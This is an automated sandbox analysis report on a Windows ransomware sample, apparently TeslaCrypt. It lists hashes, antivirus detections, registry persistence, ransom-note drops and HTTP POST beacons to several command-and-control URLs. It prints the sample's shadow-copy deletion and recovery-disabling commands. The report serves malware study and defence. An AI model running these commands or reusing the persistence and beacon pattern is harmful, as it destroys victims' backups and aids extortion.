Analysis Date: 2016-02-16 20:34:44
MD5: 1fce0e0b05bd516c507ee13f5f1b9640
SHA1: edac2789d1ebc2b8fc6080baf91296165cc826e2

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .coat md5: 94e2f96f7a025201723af30a54119207 sha1: b83c17595631780eaf366681f8daa3920d5df160 size: 4608
Section: .cbbl md5: eb6898a6132b6f9a9bd2278563842fe8 sha1: 6aae3cdfd1c1e88e25a4f8c2844d978b0ff63fef size: 141824
Section: .rdata md5: c89051e60a5694ac3b56e4da1c63f37e sha1: 8042c72ca7b34e4512aeae4538ac13f8e2b374cc size: 58880
Section: .data md5: 0ef8856b72c3ac39e14c0eafb7beb5a4 sha1: 8d2d7bab25a14b663506b5d0f4890ea1274e2a78 size: 37376
Section: .rsrc md5: 6ad86ac67168f67c69398e9b636e04b5 sha1: 6a7ae323c832d1f05b17afe3c435b753a3902436 size: 189440
Timestamp: 2016-02-08 20:29:28
Packer: Microsoft Visual C++ ?.?
PEhash: b1d5f6c5c445aabe54e5385cb49bad5ff5d1671b
IMPhash: bd2a8f9ba380f160b10d2209983a6ae7
AV CA (E-Trust Ino): Gen:Variant.Symmi.60982
AV Rising: No Virus
AV Mcafee: BackDoor-FDCH!1FCE0E0B05BD
AV Avira (antivir): TR/Crypt.Xpack.445731
AV Twister: No Virus
AV Ad-Aware: Gen:Variant.Symmi.60982
AV Alwil (avast): Win32:Malware-gen
AV Eset (nod32): Win32/Kryptik.ENJD
AV Grisoft (avg): Generic_r.HFT
AV Symantec: Trojan.Cryptlock.N!g2
AV Fortinet: W32/Generic.AC.3397816
AV BitDefender: Gen:Variant.Symmi.60982
AV K7: Trojan ( 004ddc881 )
AV Microsoft Security Essentials: Ransom:Win32/Tescrypt!rfn
AV MicroWorld (escan): Gen:Variant.Zusy.181890
AV MalwareBytes: Trojan.MalPack.PK
AV Authentium: W32/Agent.XL.gen!Eldorado
AV Emsisoft: Gen:Variant.Symmi.60982
AV Frisk (f-prot): W32/Agent.XL.gen!Eldorado
AV Ikarus: No Virus
AV Zillya!: No Virus
AV Kaspersky: Trojan-Ransom.Win32.Bitman.hzn
AV Trend Micro: No Virus
AV VirusBlokAda (vba32): No Virus
AV CAT (quickheal): Ransom.Crowti.WR7
AV BullGuard: Gen:Variant.Zusy.181890
AV Arcabit (arcavir): Gen:Variant.Symmi.60982
AV ClamAV: No Virus
AV Dr. Web: Trojan.Inject1.56622
AV F-Secure: Gen:Variant.Zusy.181890

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\plgguky.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\plgguky.exe
Creates Process: C:\WINDOWS\system32\cmd.exe /c DEL C:\EDAC27~1.EXE

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\EDAC27~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\plgguky.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝ C:\Documents and Settings\Administrator\Application Data\plgguky.exe\\x00
Registry: HKEY_CURRENT_USER\Software\2291D7745DC9014\data ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝ C:\Documents and Settings\Administrator\Application Data\plgguky.exe\\x00
Registry: HKEY_CURRENT_USER\Software\xxxsys\ID ➝ NULL
Creates FileC:\Documents and Settings\Administrator\Templates\excel.xls
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Templates\powerpnt.ppt
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20MSI3716.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Templates\quattro.wb2
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\Beethoven's Symphony No. 9 (Scherzo).wma
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+lcr.png
Creates FilePIPE\srvsvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\My Playlists\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+lcr.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+lcr.txt
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+lcr.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+lcr.png
Creates Processvssadmin.exe delete shadows /all /Quiet
Creates Processbcdedit.exe /set {current} recoveryenabled off
Creates Mutex__sys_234238233295

Process
↳ bcdedit.exe /set {current} recoveryenabled off

Process
↳ vssadmin.exe delete shadows /all /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNShnb.net
Type: A
222.165.133.242
DNSfirecheerleaders.fr
Type: A
213.186.33.171
DNSladiesdehaan.be
Type: A
62.210.92.9
DNSchonburicoop.net
Type: A
27.254.96.151
DNSpasslift.com
Type: A
217.116.196.239
DNSactionpourisrael.com
Type: A
213.186.33.4
HTTP POSThttp://hnb.net/templates/assets/email_tmpl/uploads/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://firecheerleaders.fr/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://ladiesdehaan.be/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://chonburicoop.net/tmp/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://passlift.com/templates/sj_icenter/html/mod_k2_content/Default/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://actionpourisrael.com/modules/mod_speedup/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Flows TCP192.168.1.1:1031 ➝ 222.165.133.242:80
Flows TCP192.168.1.1:1032 ➝ 213.186.33.171:80
Flows TCP192.168.1.1:1033 ➝ 62.210.92.9:80
Flows TCP192.168.1.1:1034 ➝ 27.254.96.151:80
Flows TCP192.168.1.1:1035 ➝ 217.116.196.239:80
Flows TCP192.168.1.1:1036 ➝ 213.186.33.4:80

Raw Pcap
0x00000150 (00336)   0d0a6461 74613d33 38333844 36453234   ..data=3838D6E24

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f7370 65656475 702f6d7a 7379732e   d_speedup/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a206e2c 202c202c 202c202c   cept: n, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a2061 6374696f 6e706f75   .Host: actionpou
0x00000100 (00256)   72697372 61656c2e 636f6d0d 0a436f6e   risrael.com..Con
0x00000110 (00272)   74656e74 2d4c656e 6774683a 20363435   tent-Length: 645
0x00000120 (00288)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000130 (00304)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x00000140 (00320)   613d3338 33384436 45323443 32384430   a=3838D6E24C28D0


Strings